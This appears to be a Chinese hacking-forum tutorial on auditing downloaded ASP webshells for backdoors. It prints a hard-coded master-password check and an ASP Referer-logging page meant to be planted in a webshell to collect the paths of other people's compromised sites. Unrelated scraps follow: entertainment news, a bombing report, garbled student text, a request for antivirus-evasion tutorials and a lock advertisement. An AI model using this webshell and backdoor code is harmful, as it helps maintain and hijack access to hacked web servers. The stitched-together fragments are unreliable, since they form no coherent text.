我等小菜自己写不来asp马,只能用大虾写的,但网上流传的都不知道是几手的了 难免有些居心不良的人会在里面加后门。 好不容易拿到个shell又被别人偷走了怎么甘心啊! 所以在下完asp木马后要先检查有没后门, 通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具 解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录 正常的: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 加有万能密码的: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!" 1111111就是传说中的万能密码了。 找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了! 下面来找马大多数都喜欢用框架挂马: 找到后删了,到此asp后门就算剔除了! 下面教大家后门的原理: 这是一段收信的asp代码将其保存为1.asp <%url=Request.ServerVariables("HTTP_Referer") set fs=server.CreateObject("Scripting.FileSystemObject") set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True) file.writeline url file.close set file=nothing set fs=nothing %> 代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址 简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里 上传到空间比如 http://127.0.0.1/1.asp 然后里用 插到asp木马中 那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
娱乐中国讯 2月5日,由爱奇艺出品的“无名”戏剧人生活生产真人秀《戏剧新生活》,将于本周六晚8点迎来第四期。本期魏大勋惊喜入社,与《平凡的荣耀》中殷盛超的扮演者赵晓苏继续合作。修睿全票通过当选第二任社...
土耳其阿纳多卢通讯社消息,当地时间2月6日,据索马里一名官员说,在首都摩加迪沙的一个十字路口发生一起爆炸,至少1人丧生。爆炸发生在Afrik酒店附近,这里上周刚刚发生一起恐怖袭击,10人死亡,20...
今日中午中国大学生跟上面一样一堂疫情防控思想政治大课,立刻就需要和易祥千玺、易烊千玺、王俊凯一起上课的时候,学生们你准备好了吗。下边我产生:中国大学生跟上面一样一堂疫情防控思想政治大课 学生疫情防控...
本文目录一览:...
本文导读目录: 1、能不能发一套免杀教程给我 地址也行 但要能用 网上搜了很多教程地址都不能用 邮箱liuaoyu321@163.com 2、黑客怎么破密? 3、饭客网络是骗子,QQ:1984...
智能锁区别于传统的锁具,自从上线之后就引起了热议,虽说在价值上面曾担当到过质疑,可是它的需求量和用户量却在不绝的上升之中。这都归功于我们智能化糊口的影响,本日小编要给各人先容的呢是关于缔斯盾智能锁...